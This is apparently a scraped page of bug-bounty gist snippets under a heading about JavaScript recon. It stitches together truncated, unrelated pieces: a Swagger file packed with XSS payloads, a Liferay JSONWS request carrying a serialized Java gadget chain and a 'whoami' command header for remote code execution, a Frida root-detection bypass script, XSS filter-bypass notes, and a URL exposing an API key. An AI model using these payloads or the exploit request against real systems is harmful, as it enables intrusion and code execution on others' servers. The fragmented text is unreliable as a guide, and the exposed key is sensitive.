This is a simple guide to performing JavaScript recon in bug bounty
- The first step is to collect as many JavaScript files as possible (more files = more paths and parameters -> more vulns)
| package main | |
| import ( | |
| "fmt" | |
| "strconv" | |
| "sync" | |
| ) | |
| func main() { | |
| fmt.Println("vim-go") |
| { "swagger": "2.0", "info": { "title": "/qqq'\"><b style='x: expression(alert(1))'>", "description": "/rrr'\"><b style='x: expression(alert(1))'>", "version": "2017-06-04T22:56:06+00:00", "contact": { "name": "/sss'\"></script><img src=x onerror=alert(document.domain)>", "url": "javascript:alert(document.domain)", "email": "[email protected]" } }, "host": "xok", "basePath": "/\"'>eee<img src=x onerror=alert(document.domain)>", "schemes": [ "https" ], "consumes": [ "/ttt'\"></script></select>fff<img src=x onerror=alert(document.domain)>" ], "produces": [ "/uuu'\"></script>ggg<img src=x onerror=alert(document.domain)>" ], "securityDefinitions": { "oauth2": { "flow": "implicit", "authorizationUrl": "javascript:alert(document.domain)//", "scopes": { "web-api": "testing" }, "type": "oauth2" } }, "security": [ { "tokenHeader": ["/xxx'\"><img src=x onerror=alert(document.domain)>"] } ], "paths": { "/><img src=x onerror=alert(document.domain)>": { "post": { "summary": "/'\">bbb</script><img src=x onerror=alert(document.domain)> |
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
| POST /api/jsonws/invoke HTTP/1.1 | |
| Host: <Host> | |
| Connection: close | |
| cmd2: whoami | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 4910 | |
| cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73 |
| # Copyright 2017-2020 Jeff Foley. All rights reserved. | |
| # Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file. | |
| # Should results only be collected passively and without DNS resolution? Not recommended. | |
| #mode = passive | |
| mode = active | |
| # The directory that stores the Cayley graph database and other output files | |
| # The default for Linux systems is: $HOME/.config/amass | |
| #output_directory = amass |
| https://ipgeolocation.abstractapi.com/v1/?api_key=5ff38bb958864eb7995bfe960bed76a2&ip_address=102.27.170.66 |
| // $ frida -l antiroot.js -U -f com.example.app --no-pause | |
| // CHANGELOG by Pichaya Morimoto ([email protected]): | |
| // - I added extra whitelisted items to deal with the latest versions | |
| // of RootBeer/Cordova iRoot as of August 6, 2019 | |
| // - The original one just fucked up (kill itself) if Magisk is installed lol | |
| // Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
| // If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
| Java.perform(function() { | |
| var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
| <a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)"> | |
| [1] | |
| Bytes: | |
| \x09 \x0a \x0c \x0d \x20 \x2f | |
| <a/href="javascript:alert(1)"> | |
| <a\x09href="javascript:alert(1)"> | |
| [2,3] |